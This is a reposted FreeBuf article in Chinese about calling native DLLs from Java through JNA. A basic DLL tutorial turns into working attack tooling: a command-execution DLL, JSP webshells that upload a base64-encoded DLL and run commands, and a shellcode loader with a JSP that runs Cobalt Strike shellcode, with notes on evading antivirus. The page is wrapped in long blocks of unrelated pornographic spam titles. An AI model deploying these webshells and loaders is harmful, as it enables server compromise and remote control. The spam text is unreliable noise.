欧美a级理论片_国产一区三区三区_性欧美xxxx视频在线观看_日韩国产欧美精品一区二区三区_四虎久久免费_亚洲免费视频观看_亚洲国产天堂_91成人在线观看国产_婷婷激情图片久久_自拍偷拍欧美精品_97视频免费观看_亚洲天堂手机

當前位置: 首頁 >綜合 > 正文

【天天報資訊】我們一起聊聊 JNA 調用動態鏈接庫

2023-05-09 08:08:10 來源:FreeBuf.COM
前言

在一次實際項目中遇到了無法調用exe可執行文件,聽說哥斯拉利用JNA技術實現了內存加載exe、執行命令等操作,特來實踐一下。


(資料圖片)

JNA 基礎知識

JNA全稱:Java Native Access,是建立在JNI(Java Native Interface)技術之上的Java開源框架,JNA提供了一組Java工具類用于在運行期間動態訪問的系統本地庫。簡單理解就是:JNA提供了一個"橋梁",可以利用Java代碼直接訪問動態鏈接庫中的函數。

調用JNI接口

調用JNI接口的步驟為:

創建工程,將dll文件放到工程下引入JNA相關的jar包創建繼承自Library類的接口接口中創建對象用于加載DLL/SO的類庫接口中聲明DLL/SO類庫頭文件中暴露的方法調用該方法編譯DLL

以windows為例,使用Visual Studio 創建一個動態鏈接庫的工程,并定義一個頭文件testdll.h和源文件testdll.cpp。簡單實現一個SayHello的方法創建testdll.cpp,作用是用來實現被聲明的函數。

#include "pch.h"#include "testdll.h"void SayHello(){ std::cout << "Hello!你成功了!" << std::endl;}

創建testdll.h頭文件,作用是用來聲明需要導出的函數接口

#pragma once#include extern "C" __declspec(dllexport) void SayHello();//聲明一個可被調用的函數“SayHello()”,它的返回類型是void。//extern "C"的作用是告訴編譯器將被它修飾的代碼按C語言的方式進行編譯//__declspec(dllexport),此修飾符告訴編譯器和鏈接器被它修飾的函數或變量需要從DLL導出

而后編譯出dll。注意:要DLL位數要與JDK位數相同,否則無法調用。

導入JAR包

首先創建java工程,可以是普通項目也可以是maven功能。maven 需要導入依賴

net.java.dev.jna jna 5.13.0 net.java.dev.jna jna-platform 5.13.0

普通工程可以在 https://github.com/java-native-access/jna 下載jna jar包和platform jar包并導入。

調用DLL

我們需要繼承Library類接口,調用Native類的load方法將我們的testdll.dll加載進來并轉換為本地庫,而后聲明SayHello方法。

public interface Mydll extends Library { Mydll mydll = (Mydll)Native.load("testdll",Mydll.class); void SayHello();}

調用時不需要鏈接庫的后綴,會自動加上。聲明SayHello方法時,結合testdll.h頭文件,沒有返回值為void,也沒有需要的數據類型。(需要的話可查找JNA 數據類型對應關系)

然后在主方法里調用SayHello方法

public static void main(String[] args) { Mydll.mydll.SayHello();}

可以看到成功調用了testdll.dll的SayHello方法。

加載動態鏈接庫

在上面的代碼中,我們直接利用Native.load將dll轉換為本地庫,在此之前缺少了加載這一步。常見的加載動態鏈接庫有三種方法:

System.load / System.loadLibraryRuntime.getRuntime().load / Runtime.getRuntime().loadLibrarycom.sun.glass.utils.NativeLibLoader.loadLibrary

在使用時也有一些區別:load接收的是系統的絕對路徑,loadLibrary接收的是相對路徑。但實際利用過程中肯定是絕對路徑優先于相對路徑。以Runtime.getRuntime().load為例:

但實際利用可能會被安全軟件捕捉。我們反射調用loadLibrary方法。代碼來自Java加載動態鏈接庫這篇文章

try { Class clazz = Class.forName("java.lang.ClassLoader"); java.lang.reflect.Method method = clazz.getDeclaredMethod("loadLibrary", Class.class, String.class, boolean.class); method.setAccessible(true); method.invoke(null, clazz, "C:\\Users\\cseroad\\source\\repos\\testdll\\x64\\Release\\testdll.dll", true); Mydll mydll = (Mydll)Native.load("testdll",Mydll.class); mydll.SayHello();}catch (Exception e){ e.printStackTrace();}場景利用

現在我們想一下具體場景的利用,在此基礎上調整我們的代碼。

webshell

既然jna加載動態鏈接庫后轉換為本地庫,可以調用dll的任意方法,那實現一個命令執行應該也是可以的。

#include "pch.h"#include "command.h"#include #include void executeCommand(const char* command) { char psBuffer[128]; FILE* pPipe; if ((pPipe = _popen(command, "r")) == NULL) { exit(1); } while (fgets(psBuffer, 128, pPipe)) { puts(psBuffer); } int endOfFileVal = feof(pPipe); int closeReturnVal = _pclose(pPipe); if (endOfFileVal) { printf("\nProcess returned %d\n", closeReturnVal); } else { printf("Error: Failed to read the pipe to the end.\n"); }}

相應的頭文件

#pragma once#include extern "C" __declspec(dllexport) void executeCommand(const char* command);

java代碼加載并調用。

import com.sun.jna.Library;import com.sun.jna.Native;public class test {public interface Mydll extends Library { void executeCommand(String command); } public static void main(String[] args) { try { Class clazz = Class.forName("java.lang.ClassLoader"); java.lang.reflect.Method method = clazz.getDeclaredMethod("loadLibrary", Class.class, String.class, boolean.class); method.setAccessible(true); method.invoke(null, clazz, "C:\\Users\\cseroad\\source\\repos\\testdll\\x64\\Release\\testdll.dll", true); Mydll mydll = (Mydll)Native.load("testdll",Mydll.class); mydll.executeCommand("ipconfig"); }catch (Exception e){ e.printStackTrace(); } }}

成功實現。結合實際利用我們還需要優化一下代碼,改成jsp腳本文件。因為com.sun.jna包是第三方包,在實際利用肯定沒有。所以這里選擇將自己寫的代碼和jna.jar一塊用maven打包為maven02-1.0-SNAPSHOT-jar-with-dependencies.jar試試。

再把test類名修改為show,把dll動態鏈接庫和將要執行的命令作為參數傳遞進去。現在還差一個加載外部的jar包并調用方法的jsp腳本文件。

<%@ page import="java.lang.reflect.Method" %><%@ page import="java.net.URL" %><%@ page import="java.net.URLClassLoader" %><% String path = "file:E:\\apache-tomcat-7.0.107\\webapps\\test\\maven02-1.0-SNAPSHOT-jar-with-dependencies.jar"; URLClassLoader urlClassLoader =null; Class MyTest = null; //通過URLClassLoader加載外部jar urlClassLoader = new URLClassLoader(new URL[]{new URL(path)}); //獲取外部jar里面的具體類對象 MyTest = urlClassLoader.loadClass("com.jna.jnatest"); //創建對象實例 Object instance = MyTest.newInstance(); //獲取實例當中的方法名為show Method method = MyTest.getMethod("show", String.class,String.class); //傳入實例以及方法參數信息執行這個方法 Object ada = method.invoke(instance, "C:\\Users\\cseroad\\source\\repos\\testdll\\x64\\Release\\testdll.dll","whoami");%>

這樣用的時候需要向目標服務器手動上傳兩個文件,jar包和dll文件。我們再進一步優化一下。

<%@ page import="java.lang.reflect.Method" %><%@ page import="java.net.URLClassLoader" %><%@ page import="java.net.URL" %><%! private String getFileName(){ String fileName = ""; java.util.Random random = new java.util.Random(System.currentTimeMillis()); String os = System.getProperty("os.name").toLowerCase(); if (os.contains("windows")){ fileName = "C:\\Windows\\Temp\\" + random.nextInt(10000000) + ".dll"; }else { fileName = "/tmp/"+ random.nextInt(10000000) + ".so"; } return fileName; } public String UploadBase64DLL(String base64) throws Exception { sun.misc.BASE64Decoder b = new sun.misc.BASE64Decoder(); java.io.File file = new java.io.File(getFileName()); java.io.FileOutputStream fos = new java.io.FileOutputStream(file); fos.write(b.decodeBuffer(base64)); fos.close(); return file.getAbsolutePath(); }%><% try{ String cmd = request.getParameter("cmd"); String base64 = request.getParameter("base64"); String file = UploadBase64DLL(base64); String path = "file:E:\\apache-tomcat-7.0.107\\webapps\\test\\maven02-1.0-SNAPSHOT-jar-with-dependencies.jar"; //通過URLClassLoader加載外部jar URLClassLoader urlClassLoader = new URLClassLoader(new URL[]{new URL(path)}); //獲取外部jar里面的具體類對象 Class MyTest = urlClassLoader.loadClass("com.jna.jnatest"); //創建對象實例 Object instance = MyTest.newInstance(); //獲取實例當中的方法名為show,參數只有一個且類型為string的public方法 Method method = MyTest.getMethod("show", String.class,String.class); //傳入實例以及方法參數信息執行這個方法 Object ada = method.invoke(instance, file,cmd); } catch (Exception e){ out.println(e); }%>

現在只需要手動上傳一個jar包就可以,dll通過base64編碼上傳上去。這樣參數值就是base64編碼之后的dll和cmd要執行的系統命令。

唯一的缺點就是不能在前端顯示,或許將代碼加入到冰蝎可以實現?

shellcode

既然前端無法獲取結果,那直接加載shellcode上線cs呢?我們利用同樣的方式寫出加載shellcode的代碼。shellcode.cpp

#include "shellcode.h"#include using namespace std;void shellcode(PCHAR code, DWORD buf_len) { cout << buf_len << endl; DWORD oldprotect = 0; LPVOID base_addr = NULL; // 申請一塊buf_len長度大小的空間,RW權限,不要開rwx,PAGE_EXECUTE_READWRITE base_addr = VirtualAlloc(0, buf_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); // 復制shellcode到新的空間,這個函數比較罕見,用memcpy也可以呀 unsigned char HexNumArray[4096]; int num = HexStr2HexNum(code, buf_len, HexNumArray); RtlMoveMemory(base_addr, HexNumArray, buf_len); // 修改為執行RX權限 VirtualProtect(base_addr, buf_len, PAGE_EXECUTE_READ, &oldprotect); cout << "starting spawn shellcode" << endl; // 當前進程創建線程執行shellcode auto ct = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)base_addr, 0, 0, 0); // 等待線程返回值 WaitForSingleObject(ct, -1); // 釋放內存 free(base_addr);}int HexStr2HexNum(char* HexStrArray, int len, unsigned char* HexNumArray){ int j = 0; for (int i = 0; i < len; i += 2) { if (HexStrArray[i] == 0x5C || HexStrArray[i] == 0x58 || HexStrArray[i] == 0x78) { continue; } char HIGH_BYTE = 0; char LOW_BYTE = 0; //high 4 if (HexStrArray[i] >= 0x30 && HexStrArray[i] <= 0x3A) { HIGH_BYTE = HexStrArray[i] - 0x30; } else if (HexStrArray[i] >= 0x41 && HexStrArray[i] <= 0x47) { HIGH_BYTE = HexStrArray[i] - 0x37; } else if (HexStrArray[i] >= 0x61 && HexStrArray[i] <= 0x67) { HIGH_BYTE = HexStrArray[i] - 0x57; } else { printf("Please make sure the format of Hex String is correct!\r\n"); printf("The wrong char is \"%c\", and its number is % d\r\n", HexStrArray[i], i); return -1; } //low 4 if (HexStrArray[i + 1] >= 0x30 && HexStrArray[i + 1] <= 0x3A) { LOW_BYTE = HexStrArray[i + 1] - 0x30; } else if (HexStrArray[i + 1] >= 0x41 && HexStrArray[i + 1] <= 0x47) { LOW_BYTE = HexStrArray[i + 1] - 0x37; } else if (HexStrArray[i + 1] >= 0x61 && HexStrArray[i + 1] <= 0x67) { LOW_BYTE = HexStrArray[i + 1] - 0x57; } else { printf("Please make sure the format of Hex String is correct!\r\n"); printf("The wrong char is \"%c\", and its number is % d\r\n", HexStrArray[i], i); return -1; } HexNumArray[j] &= 0x0F; HexNumArray[j] |= (HIGH_BYTE << 4); HexNumArray[j] &= 0xF0; HexNumArray[j] |= LOW_BYTE; j++; } return 0;}

shellcode.h

#pragma once#include extern "C" __declspec(dllexport) BOOL shellcode(PCHAR code, DWORD size);int HexStr2HexNum(char* HexStrArray, int len, unsigned char* HexNumArray);

在java里加載并調用,傳入shellcode和長度。以達到更好的免殺性。

import java.util.Base64;import com.sun.jna.Library;import com.sun.jna.Native;public class test {public interface Mydll extends Library { void shellcode(byte[] b,int length); } public static void show(String base64,String dllpath,String dllname) { try { Class clazz = Class.forName("java.lang.ClassLoader"); java.lang.reflect.Method method = clazz.getDeclaredMethod("loadLibrary", Class.class, String.class, boolean.class); method.setAccessible(true); method.invoke(null, clazz, dllpath, true); Mydll mydll = (Mydll)Native.load(dllname,Mydll.class); byte[] base64decodedBytes = java.util.Base64.getDecoder().decode(base64); int leng = base64decodedBytes.length; mydll.shellcode(base64decodedBytes,leng); }catch (Exception e){ e.printStackTrace(); } }public static void main(String[] args) {String base64encodedString = "XHhmY1x4NDhxxxxxxxxxxxxxxx";show(base64encodedString,"C:\\Windows\\Temp\\jna.dll","jna"); }}

此時只需要將shellcode值base64編碼當做字符傳遞即可。測試一下

可以看到正常上線,進程為javaw.exe。那在實際環境中同樣不能這樣利用。依舊把java代碼打包為jar包,再修改一下jsp腳本文件應該就可以在實際運行了。

<%@ page import="java.lang.reflect.Method" %><%@ page import="java.net.URLClassLoader" %><%@ page import="java.net.URL" %><%! private String getFileName(String dllname){ String fileName = ""; String os = System.getProperty("os.name").toLowerCase(); if (os.contains("windows")){ fileName = "C:\\Windows\\Temp\\" + dllname + ".dll"; }else { fileName = "/tmp/"+ dllname + ".so"; } return fileName; } public String UploadBase64DLL(String base64,String dllname) throws Exception { sun.misc.BASE64Decoder b = new sun.misc.BASE64Decoder(); java.io.File file = new java.io.File(getFileName(dllname)); java.io.FileOutputStream fos = new java.io.FileOutputStream(file); fos.write(b.decodeBuffer(base64)); fos.close(); return file.getAbsolutePath(); }%><% try{ String shellcode = request.getParameter("shellcode"); String base64dll = request.getParameter("base64dll"); String dllname = request.getParameter("dllname"); String pathdll = UploadBase64DLL(base64dll,dllname); String path = "file:E:\\apache-tomcat-7.0.107\\webapps\\test\\maven02-1.0-SNAPSHOT-jar-with-dependencies.jar"; URLClassLoader urlClassLoader = new URLClassLoader(new URL[]{new URL(path)}); Class MyTest = urlClassLoader.loadClass("com.jna.jnatest"); Object instance = MyTest.newInstance(); Method method = MyTest.getMethod("show", String.class,String.class,String.class); Object ada = method.invoke(instance,shellcode, pathdll,dllname); } catch (Exception e){ out.println(e); }%>

以tomcat為例,shellcode 即將cobaltstrike的shellcode進行base64編碼,base64dll 是base64編碼dll動態鏈接庫之后的值,dllname即是dll動態鏈接庫的名稱。測試可以正常上線執行命令。上線進程為java.exe。

總結

在學習JNA調用動態鏈接庫的時候,借鑒了很多師傅的思路,但無奈趕不上師傅們的高度,只能用稍微復雜點的辦法完善自己的代碼,來曲折得實現效果。

參考資料

https://www.bilibili.com/video/BV16t411A7it/?spm_id_from=333.337.search-card.all.click&vd_source=0627d2723fb97773126096556cc98e0dhttps://www.cnblogs.com/happyhuangjinjin/p/17219986.htmlhttps://tttang.com/archive/1436/https://payloads.online/archivers/2022-08-11/1/

本文作者:CSeroad,轉載請注明來自FreeBuf.COM

標簽:

返回頂部
性欧美18xxxhd| 一区二区三区在线观看视频| 久久品道一品道久久精品| 亚洲一区二区视频| 精品久久久久久综合日本欧美| 亚洲深夜福利在线| 欧洲精品毛片网站| 欧美日韩三区四区| 成人免费无码av| 国产粉嫩一区二区三区在线观看| 黄色漫画在线免费看| 西野翔中文久久精品字幕| 香蕉久久夜色精品| 久久综合久色欧美综合狠狠| 日韩欧美中文免费| 国产亚洲视频在线观看| 成人a免费视频| 国产成人一区二区三区别| 黄色小视频在线播放| 夜鲁夜鲁夜鲁视频在线播放| 精品国产91久久久久久浪潮蜜月| 美国十次了思思久久精品导航 | 久久精品不卡| 激情综合色丁香一区二区| 亚洲午夜在线视频| 中文字幕精品av| 99久久综合狠狠综合久久止| 日韩a在线播放| 精品麻豆一区二区三区| 高清精品xnxxcom| 免费xxxx性欧美18vr| 亚洲观看高清完整版在线观看 | 欧美三级电影在线看| 欧美国产日韩xxxxx| 日本一区不卡| 日韩黄色动漫| 巨胸喷奶水www久久久免费动漫| 亚洲精品一二三区区别| 91在线免费播放| 在线不卡中文字幕播放| 97在线精品国自产拍中文| 亚洲午夜高清视频| 污网站在线看| 亚洲精品18| 狠狠色丁香久久婷婷综合_中| 日韩欧美在线观看| 久久久欧美一区二区| 亚洲一卡二卡三卡四卡无卡网站在线看| 成人动漫av| 久久天堂久久| 免费国产亚洲视频| 色婷婷亚洲一区二区三区| 97色伦亚洲国产| 18禁裸男晨勃露j毛免费观看| 日本中文字幕在线看| 激情综合网五月| 国产亚洲欧美日韩日本| 国产丝袜一区二区三区免费视频| 激情一区二区三区| 夜色福利资源站www国产在线视频 夜色资源站国产www在线视频 | 国产精品视频成人| 99久久国产宗和精品1上映| 免费看男女www网站入口在线 | 成人国产精品免费观看动漫 | 国产精品久久久久久久久电影网| yourporn在线观看中文站| 亚洲涩涩av| 91麻豆精品一区二区三区| 日韩成人在线视频网站| 噜噜噜噜噜久久久久久91| 在线观看av中文| 私拍精品福利视频在线一区| 99在线精品视频| 亚洲另类图片色| 日本不卡一区| 成人精品一区二区三区免费| 精品高清在线| 最新热久久免费视频| 久久这里只有精品99| 亚洲一区 在线播放| 日本小视频在线免费观看| 精品动漫av| 91国模大尺度私拍在线视频| 国产精品一区二区女厕厕| 91xxxxx| 日韩免费一级| 99精品视频在线免费观看| 亚洲日本欧美中文幕| 亚洲日本一区二区三区在线不卡 | 欧美成人黄色| 黄网站免费久久| 精品日韩一区二区三区免费视频| 国产精品国产精品国产专区蜜臀ah | 亚洲网站在线观看| 亚洲欧洲精品在线| 成人福利片网站| 激情五月***国产精品| 日韩欧美在线网址 | chinese偷拍一区二区三区| 99久久精品费精品国产风间由美 | 国产精品亚洲不卡a| 亚州av电影免费在线观看| 欧美日韩高清| 亚洲女人的天堂| 国产91成人video| 男人插女人欧美| 美女视频亚洲色图| 中文字幕日韩精品一区 | 精品在线视频一区二区| 成人免费一区二区三区视频网站| 欧美日本二区| 欧美自拍偷拍午夜视频| 国产精品三区在线| 在线观看免费网站黄| 一本色道久久综合亚洲精品高清| 欧美精选一区二区| 欧美一区二区三区电影在线观看 | 欧美va天堂va视频va在线| 欧美视频1区| 亚洲91av| 日本特黄久久久高潮 | 91精品国产91久久久久久久久 | 超碰在线中文字幕| 免费av成人在线| 亚洲第一区中文99精品| 在线观看成人av| 成人香蕉视频| 成人美女视频在线观看| 北条麻妃一区二区三区中文字幕 | 伪装者在线观看完整版免费| 亚洲精品一区二区妖精| 欧美色区777第一页| 精品一区二区日本| 丰满诱人av在线播放| 国产乱码一区二区三区| 中文字幕在线亚洲| 手机看片福利日韩| 亚洲精品推荐| 欧美午夜丰满在线18影院| 国语精品免费视频| gogogogo高清视频在线| 老司机精品视频在线| 宅男66日本亚洲欧美视频| 国产97色在线 | 日韩| 日本妇女一区| 亚洲国产美女搞黄色| 国产精品一码二码三码在线| av文字幕在线观看| 国产一区二区h| 欧美成人免费网| 日本18视频网站| 国产精品vip| 91精品国产91综合久久蜜臀| 亚洲成年人专区| 狂野欧美xxxx韩国少妇| 一区二区国产视频| 99在线热播| segui88久久综合9999| av不卡在线观看| 91精品国产777在线观看| 在线播放av片| 丝袜国产日韩另类美女| 国产一区二区三区在线观看视频| 99免费视频观看| 青青草91久久久久久久久| 欧美亚洲愉拍一区二区| 欧美日韩视频免费在线观看| 人人精品久久| 一区二区欧美视频| 狠狠色综合网站久久久久久久| 成人ssswww在线播放| 久久蜜桃香蕉精品一区二区三区| 国产大片精品免费永久看nba| 成av人电影在线观看| 国产精品12区| 热久久视久久精品18亚洲精品| av网页在线| 国产91精品久久久久久久网曝门| 2019中文字幕全在线观看| 电影在线一区| 国产91色综合久久免费分享| 日本aⅴ大伊香蕉精品视频| 最新国产在线观看| 成人一区二区三区| 国产精品黄页免费高清在线观看| av香蕉成人| 国产三级一区二区| 成人网中文字幕| 午夜伦理福利在线| 亚洲欧美视频在线观看| 蜜桃成人免费视频| 自拍偷拍亚洲| 欧美日韩在线一区| 综合久久国产| 亚洲美女久久| 欧美www视频| 免费女人黄页| 日韩精品成人一区二区在线| 久久久免费在线观看| 伦xxxx在线|